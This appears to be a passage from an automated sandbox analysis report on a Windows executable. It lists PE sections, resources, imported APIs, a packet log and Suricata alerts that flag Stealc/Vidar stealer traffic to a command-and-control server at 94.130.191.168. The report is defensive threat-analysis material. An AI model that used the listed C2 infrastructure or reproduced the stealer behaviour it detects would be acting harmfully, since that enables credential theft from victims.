IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0x8752	0x8800	30713246f57ad95c2b3ae794e18370af	False	0.9267003676470589	data	7.6894440521297005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x109000	0xfd6	0x1000	d39b821510ff1826f121d37e861e6f04	False	0.597900390625	data	5.592923929827371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1001f0	0x4e92	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	0.9981107686188724
RT_ICON	0x105084	0x2021	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.001337386018237
RT_ICON	0x1070a8	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.6411657559198543
RT_DIALOG	0x1081d0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x1082d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x1083ec	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x10844c	0x30	data	English	United States	0.8958333333333334
RT_MANIFEST	0x10847c	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T21:08:52.058807+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.9	49713	94.130.191.168	443	TCP
2024-12-18T21:08:52.059022+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	94.130.191.168	443	192.168.2.9	49713	TCP
2024-12-18T21:08:54.358044+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	94.130.191.168	443	192.168.2.9	49714	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 21:08:00.823098898 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:00.823195934 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:00.823251963 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:00.823309898 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:00.823626995 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:00.823704004 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:00.824811935 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:00.824930906 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:00.824978113 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:00.824984074 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:00.830163002 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:00.949850082 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.147994041 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.149626970 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.149627924 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.149627924 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.269371986 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.269392014 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.269427061 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.463701010 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.467570066 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.467705011 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.467761993 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.468061924 CET	49676	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:08:01.468075037 CET	49675	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:08:01.472171068 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.472224951 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.472385883 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.480607033 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.480695963 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.480779886 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.487669945 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.487814903 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.487827063 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.496129036 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.496206999 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.496263027 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.504642963 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.504738092 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.504822016 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.512995958 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.513163090 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.513242960 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.521385908 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.521516085 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.521558046 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.529906034 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.529994965 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.561922073 CET	49674	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:08:01.587343931 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.640006065 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.659594059 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.659712076 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.659888029 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.663536072 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.663660049 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.663831949 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.670450926 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.670582056 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.670681953 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.678126097 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.678281069 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:01.678354979 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.963171959 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.963509083 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.992885113 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.993845940 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:01.994551897 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.082834959 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.082931995 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.112665892 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.113380909 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.114264965 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.278645039 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.305725098 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.305741072 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.305828094 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.311953068 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.312041998 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.312107086 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.314196110 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.314275980 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.334115028 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.335625887 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.346342087 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.425288916 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.453701973 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.455128908 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.465898037 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.469579935 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.469662905 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.469757080 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.488213062 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.646109104 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.653935909 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.653960943 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.654052019 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.661531925 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.661614895 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.679280996 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.697854042 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.699474096 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.700233936 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:02.817471027 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.819916010 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.837913036 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:02.866600990 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.011187077 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.012434006 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.012507915 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.013926983 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.014305115 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.016433001 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.016499996 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.016513109 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.016561031 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.019107103 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.019126892 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.134191036 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.139425039 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.203154087 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.207087040 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.331252098 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.331367016 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.331429005 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.334778070 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.335447073 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.336106062 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.336174011 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.336359024 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.336416960 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.339423895 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.339947939 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.455475092 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.460495949 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.523209095 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.527596951 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.652241945 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.654999971 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.656064987 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.656125069 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.656197071 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.656249046 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.660360098 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.661412954 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.715116024 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.717418909 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.781114101 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.824698925 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.839978933 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.844724894 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.847480059 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.973995924 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.976895094 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.993174076 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.993268967 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:03.993280888 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.993318081 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.996002913 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:03.996056080 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.036767006 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.039424896 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.116477013 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.159621954 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.166313887 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.169321060 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.308875084 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.312928915 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.314955950 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.315036058 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.315047026 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.315099955 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.317614079 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.318311930 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.358418941 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.362215042 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.374301910 CET	49677	443	192.168.2.9	20.189.173.11
Dec 18, 2024 21:08:04.437725067 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.481786013 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.500722885 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.503107071 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.629887104 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.632278919 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.634886980 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.634974957 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.635034084 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.635199070 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.638689995 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.642662048 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.692940950 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.733644962 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.748744965 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.758457899 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.804790020 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.822073936 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.822180986 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.825630903 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.868558884 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.946151018 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.952914000 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.956533909 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.956557989 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:04.956669092 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:04.959151983 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.016155005 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.019176006 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.079272985 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.138478041 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.138595104 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.141688108 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.148091078 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.150830984 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.270689011 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.275019884 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.275038958 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.275116920 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.278975010 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.279212952 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.386441946 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.389970064 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.399497032 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.462673903 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.462732077 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.465744019 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.465843916 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.467808008 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.552781105 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.586211920 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.588069916 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.596642017 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.596698999 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.596757889 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.605752945 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.608428955 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.728033066 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.778474092 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.781248093 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.784396887 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.784450054 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.784454107 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.784499884 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.786967993 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.787113905 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.906795025 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.923046112 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.926628113 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.980983019 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:05.981045008 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:05.983486891 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:06.088687897 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:06.098607063 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:06.101234913 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:06.103008032 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:06.103492022 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:06.103555918 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:06.103688955 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:06.103744030 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:06.105659962 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:06.105811119 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:08:06.225238085 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:08:06.268826008 CET	443	49707	13.107.246.63	192.168.2.9
